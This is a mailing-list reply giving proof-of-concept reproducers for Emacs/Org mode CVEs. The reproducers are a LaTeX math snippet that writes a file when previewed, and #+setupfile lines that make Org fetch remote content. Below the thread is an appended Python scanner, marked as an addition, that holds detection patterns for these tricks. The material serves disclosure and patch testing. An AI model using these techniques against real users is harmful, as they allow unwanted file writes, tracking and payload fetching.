From: Max Nikulin <manikulin@gmail.com>
To: Sean Whitton <spwhitton@spwhitton.name>,
Ihor Radchenko <yantar92@posteo.net>
Cc: emacs-devel@gnu.org, team@security.debian.org
Subject: Re: Reproducers for recent Emacs security issues
Date: Sun, 14 Apr 2024 11:41:31 +0700
Message-ID: <706e1218-7451-4221-830a-ae3db3bf842e@gmail.com>
In-Reply-To: <875xwk8w5w.fsf@melete.silentflame.com>
On 14/04/2024 10:23, Sean Whitton wrote:
>
> I already have a sample Org file that I can use to test whether
> CVE-2024-30202 is fixed. Would you happen to already have reproducers
> for the other two problems to hand?
LaTeX preview issue
===================
- CVE-2024-30203 In Emacs before 29.3, Gnus treats inline MIME contents
as trusted.
- CVE-2024-30204 In Emacs before 29.3, LaTeX preview is enabled by
default for e-mail attachments.
It requires fixes in Emacs code besides Org mode.
1. Install dvipng.
Alternatively you may install dvisvgm and add to your init file
(setq org-preview-latex-default-process 'dvisvgm)
2. Send a mail message with an attachment having
Content-Type: text/x-org
or
Content-Type: text/org
depending on MUA configuration. By default you may get
application/vnd.lotus-organizer for .org files due to /etc/mime.types
Attachment content:
---- 8< ----
#+startup: latexpreview
LaTeX:
\begin{equation}
\newwrite\testfile\openout\testfile=\jobname.poc
\write\testfile{PoC}
\closeout\testfile
A \to \textrm{/tmp/\jobname.poc}
\end{equation}
*Warning!* Change the math snippet before every test
or remove the cached image.
---- >8 ----
3. Open message.
LaTeX preview never worked in attachment inline preview.
Check that a file is created in /tmp/
ls -l tmp/orgtex*.poc
The issue is not fixed for the scenario when an arbitrary text file is
opened in Emacs directly (e.g. a file downloaded from some web site).
Attempts to download remote content
===================================
CVE-2024-30205 In Emacs before 29.3, Org mode considers contents of
remote files to be trusted. This affects Org Mode before 9.6.23.
Actually there are 2 issues. They may be used to track whether users
receive messages, i.e. that mail addresses are valid. In addition they
allow downloading a payload from a remote site for the LaTeX preview or
code execution exploits.
[BUG] Unsolicited download of remote resources.
Fri, 2 Feb 2024 23:57:54 +0700.
https://list.orgmode.org/upj6uk$b7o$1@ciao.gmane.io
--- 8< ---
#+setupfile: http://localhost:8000/setup-1234567890.org
--- >8 ---
[BUG] Org may fetch remote content without asking user consent.
Wed, 7 Feb 2024 17:54:07 +0700.
https://list.orgmode.org/upvngj$150v$1@ciao.gmane.io
Requires the gvfs-backends package to be installed.
--- 8< ---
#+setupfile: /dav:localhost#8000:/msg-123456.org
--- >8 ---
Notice that the following commit is not mentioned in the CVE description.
https://git.savannah.gnu.org/cgit/emacs.git/commit/?id=e56f0ef51bf
2024-02-02 20:59:41 +0100 Ihor Radchenko: org: Fix security prompt for
downloading remote resource
Backporting fixes to Emacs-28 requires more changes since the dialog that
asks the user whether a file should be downloaded was implemented in Org-9.6
while Emacs-28 is shipped with Org-9.5.
Trying to reproduce, you may face the following issue:
[BUG] Partially broken Org mode when remote setupfile is unavailable.
Tue, 19 Mar 2024 17:46:46 +0700.
https://list.orgmode.org/utbqeo$bk3$1@ciao.gmane.io
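A defender-side triage check, added here and not part of the mailing-list thread: it scans Org text for the two ingredients the reproducers above rely on (remote `#+setupfile`/`#+include` targets, including TRAMP-style `/dav:` paths, and TeX file-writing primitives inside math environments) so a downloaded `.org` file or attachment can be flagged before it is opened with preview enabled. The directive list, the remote-scheme pattern and the sample input are my own assumptions and constructed data.

```python
"""Flag Org directives that fetch remote content and LaTeX fragments that
write files. Added example, not code from Emacs or Org mode."""
import re

# Directives that make Org fetch another file before rendering (assumed list).
FETCH_DIRECTIVES = re.compile(r"^\s*#\+(setupfile|include):\s*(\S+)", re.I | re.M)
# URL schemes (http://, https://, ...) and TRAMP-style paths (/dav:, /ssh:, ...).
REMOTE_RE = re.compile(r"^(?:[a-z][a-z0-9+.-]*://|/[a-z0-9]+:)", re.I)
# Startup option that turns on LaTeX preview for the whole buffer.
PREVIEW_STARTUP = re.compile(r"^\s*#\+startup:.*latexpreview", re.I | re.M)
# TeX primitives that open or write files; none belong in a math snippet.
TEX_WRITE = re.compile(r"\\(openout|write18|write|immediate)\b")
MATH_ENV = re.compile(
    r"\\begin\{(equation|align|displaymath)\*?\}(.*?)\\end\{\1\*?\}", re.S)


def scan_org(text):
    """Return a list of (kind, where, value) findings for one Org document."""
    findings = []
    for m in FETCH_DIRECTIVES.finditer(text):
        directive, target = m.group(1).lower(), m.group(2)
        if REMOTE_RE.match(target):          # local paths like ./x.org are fine
            findings.append(("remote-fetch", directive, target))
    if PREVIEW_STARTUP.search(text):
        findings.append(("latex-preview-startup", "startup", "latexpreview"))
    for env in MATH_ENV.finditer(text):
        for w in TEX_WRITE.finditer(env.group(2)):
            findings.append(("tex-file-write", env.group(1), w.group(0)))
    return findings


# Constructed sample: a file mixing a harmless local include with the
# patterns discussed in the thread.
SAMPLE = r"""#+title: constructed sample
#+startup: latexpreview
#+setupfile: http://localhost:8000/setup-1234567890.org
#+include: ./local-notes.org
#+setupfile: /dav:localhost#8000:/msg-123456.org
Some text.
\begin{equation}
\newwrite\testfile\openout\testfile=\jobname.poc
\write\testfile{x}
\end{equation}
"""

if __name__ == "__main__":
    for kind, where, value in scan_org(SAMPLE):
        print(f"{kind:22} {where:10} {value}")
```

Wire it into whatever step hands files to Emacs (a mail filter, a download hook) and refuse or quarantine anything with a non-empty result; it is a heuristic, not a replacement for the upstream fixes.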